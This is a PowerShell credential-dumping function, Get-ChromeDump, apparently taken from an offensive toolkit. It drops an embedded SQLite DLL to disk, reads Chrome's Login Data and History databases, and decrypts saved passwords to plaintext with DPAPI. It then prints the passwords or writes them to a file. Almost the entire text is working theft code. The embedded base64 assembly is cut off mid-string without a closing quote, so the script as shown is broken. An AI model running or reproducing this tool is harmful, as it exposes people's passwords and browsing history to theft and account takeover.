Function Get-ChromeDump {
<#
.SYNOPSIS
This function returns any passwords and history stored in the Chrome SQLite databases.
.DESCRIPTION
This function uses the System.Data.SQLite assembly to parse the different SQLite db files used by Chrome to save passwords and browsing history. The System.Data.SQLite assembly
cannot be loaded from memory. This is a limitation for assemblies that contain any unmanaged code and/or are compiled without the /clr:safe option.
.PARAMETER OutFile
Path of a file to dump all results to. When omitted, the results are written to the output stream instead.
.EXAMPLE
Get-ChromeDump -OutFile "$env:HOMEPATH\chromepwds.txt"
Dump all Chrome passwords and history to the specified file
.LINK
http://www.xorrior.com
#>
[ CmdletBinding ( ) ]
param (
[ Parameter ( Mandatory = $False ) ]
[ string ] $OutFile
)
#Add the required assembly for decryption
Add-Type -Assembly System . Security
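#Check whether the script is running as SYSTEM. Decryption will not work in that context: the saved passwords are unprotected further down with DataProtectionScope.CurrentUser, which only succeeds under the user account that protected them.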
if ( ( [ System.Security.Principal.WindowsIdentity ] :: GetCurrent ( ) ) . IsSystem ) {
Write-Warning " Unable to decrypt passwords contained in Login Data file as SYSTEM. "
$NoPasswords = $True
}
if ( [ IntPtr ] :: Size -eq 8 )
{
#64 bit version
$assembly = " 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
}
else
{
#32 bit version
$assembly = " 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
}
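#This assembly cannot be loaded from memory: it was most likely not compiled using /clr:safe and contains unmanaged code, and assemblies of this type only load from disk. The DLL is therefore written to $env:LOCALAPPDATA\System.Data.SQLite.dll. This function never deletes it (it only prints a reminder at the end), so the file stays behind as an on-disk artifact until it is removed by hand.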
#DLL for sqlite queries and parsing
#http://system.data.sqlite.org/index.html/doc/trunk/www/downloads.wiki
Write-Verbose " [+]System.Data.SQLite.dll will be written to disk "
$content = [ System.Convert ] :: FromBase64String ( $assembly )
$assemblyPath = " $( $env:LOCALAPPDATA ) \System.Data.SQLite.dll "
if ( Test-path $assemblyPath )
{
try
{
Add-Type -Path $assemblyPath
}
catch
{
Write-Warning " [!]Unable to load SQLite assembly "
break
}
}
else
{
[ System.IO.File ] :: WriteAllBytes ( $assemblyPath , $content )
Write-Verbose " [+]Assembly for SQLite written to $assemblyPath "
try
{
Add-Type -Path $assemblyPath
}
catch
{
Write-Warning " [!]Unable to load SQLite assembly "
break
}
}
#Check if Chrome is running. The data files are locked while Chrome is running
if ( Get-Process | Where-Object { $_ . Name -like " *chrome* " } ) {
Write-Warning " [!]Cannot parse Data files while chrome is running "
break
}
#grab the path to Chrome user data
$OS = [ environment ] :: OSVersion . Version
if ( $OS . Major -ge 6 ) {
$chromepath = " $( $env:LOCALAPPDATA ) \Google\Chrome\User Data\Default "
}
else {
$chromepath = " $( $env:HOMEDRIVE ) \ $( $env:HOMEPATH ) \Local Settings\Application Data\Google\Chrome\User Data\Default "
}
if ( ! ( Test-path $chromepath ) ) {
Throw " Chrome user data directory does not exist "
}
else {
#DB for CC and other info
if ( Test-Path -Path " $chromepath \Web Data " ) { $WebDatadb = " $chromepath \Web Data " }
#DB for passwords
if ( Test-Path -Path " $chromepath \Login Data " ) { $loginDatadb = " $chromepath \Login Data " }
#DB for history
if ( Test-Path -Path " $chromepath \History " ) { $historydb = " $chromepath \History " }
#$cookiesdb = "$chromepath\Cookies"
}
if ( ! ( $NoPasswords ) ) {
#Parse the login data DB
$connStr = " Data Source= $loginDatadb ; Read Only=True; Version=3; "
$connection = New-Object System . Data . SQLite . SQLiteConnection ( $connStr )
$OpenConnection = $connection . OpenAndReturn ( )
Write-Verbose " Opened DB file $loginDatadb "
$query = " SELECT * FROM logins; "
$dataset = New-Object System . Data . DataSet
$dataAdapter = New-Object System . Data . SQLite . SQLiteDataAdapter ( $query , $OpenConnection )
[ void ] $dataAdapter . fill ( $dataset )
$logins = @ ( )
Write-Verbose " Parsing results of query $query "
$dataset . Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$encryptedBytes = $_ . password_value
$username = $_ . username_value
$url = $_ . action_url
$decryptedBytes = [ Security.Cryptography.ProtectedData ] :: Unprotect ( $encryptedBytes , $null , [ Security.Cryptography.DataProtectionScope ] :: CurrentUser )
$plaintext = [ System.Text.Encoding ] :: ASCII . GetString ( $decryptedBytes )
$login = New-Object PSObject -Property @ {
URL = $url
PWD = $plaintext
User = $username
}
$logins + = $login
}
}
#Parse the History DB
$connString = " Data Source= $historydb ; Version=3; "
$connection = New-Object System . Data . SQLite . SQLiteConnection ( $connString )
$Open = $connection . OpenAndReturn ( )
Write-Verbose " Opened DB file $historydb "
$DataSet = New-Object System . Data . DataSet
$query = " SELECT * FROM urls; "
$dataAdapter = New-Object System . Data . SQLite . SQLiteDataAdapter ( $query , $Open )
[ void ] $dataAdapter . fill ( $DataSet )
$History = @ ( )
$dataset . Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$HistoryInfo = New-Object PSObject -Property @ {
Title = $_ . title
URL = $_ . url
}
$History + = $HistoryInfo
}
if ( ! ( $OutFile ) ) {
" [*]CHROME PASSWORDS `n "
$logins | Format-Table URL , User , PWD -AutoSize | Out-String
" [*]CHROME HISTORY `n "
$History | Format-List Title , URL | Out-String
}
else {
" [*]LOGINS `n " | Out-File $OutFile
$logins | Out-File $OutFile -Append
" [*]HISTORY `n " | Out-File $OutFile -Append
$History | Out-File $OutFile -Append
}
Write-Warning " [!] Please remove SQLite assembly from here: $assemblyPath "
}